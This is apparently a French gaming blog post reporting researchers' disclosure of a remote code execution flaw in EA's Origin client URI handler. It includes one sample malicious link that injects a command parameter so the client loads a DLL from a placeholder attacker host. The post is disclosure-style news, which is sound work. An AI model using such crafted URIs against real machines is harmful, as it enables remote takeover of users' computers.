Select Page

Découverte d’une faille sur Origin, les PC des gamers vulnérables !

Découverte d’une faille sur Origin, les PC des gamers vulnérables !

Une faille permettrait à des pirates de prendre controle de votre ordinateur à partir d’Origin! 40 millions de joueurs concernés.

L’attaque, démontrée vendredi à Amsterdam lors de la conférence « Black Hat security« , ne prend que quelques secondes à mettre en place. Aucune interaction avec la victime n’est requise et cela à été découvert par les chercheurs de ReVuln (@revuln) basés à Malte. L’exploit de la faille est possible en manipulant les URI ( identifiant uniforme de ressource) utilisées par les sites d’EA pour lancer / quitter automatiquement les jeux sur votre machine Mac ou Pc, pas de jaloux ! « En d’autres termes, un pirate peut concevoir un lien Internet malveillant qui pourra exécuter du code à distance sur votre machine. Machine sur laquelle est installé Origin. »

revuln découvre une faille URI sur Origin

La démonstration, ci-dessous, montre en vidéo la prise de contrôle d’un ordinateur sur lequel le client Origin et le jeu Crysis 3 jeu ont été  installé. Par défaut, EA utilise le lien origin://LaunchGame/71503 pour activer le jeu. Si un une victime clique sur une URI telle que origin://LaunchGame/71503?CommandParams= -openautomate \\ATTACKER_IP\evil.dll, le client Origin chargera un fichier du «choix du pirate » sur la machine cible.

Exploit en vidéo par les chercheurs de Revuln

Update: « Our team is constantly investigating hypotheticals like this one as we continually update our security infrastructure », selon un porte-parole d’EA.

Plus d’infos : http://www.revuln.com/files/ReVuln_EA_Origin_Insecurity.pdf

À propos de l’auteur

Garu

Un peu de « gamer », une pincée de « geek » et beaucoup de gamers.re !

Répondre

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Abonnez-vous à ce blog par e-mail.

Saisissez votre adresse e-mail pour vous abonner à ce blog et recevoir une notification de chaque nouvel article par email.

Aller à la barre d’outils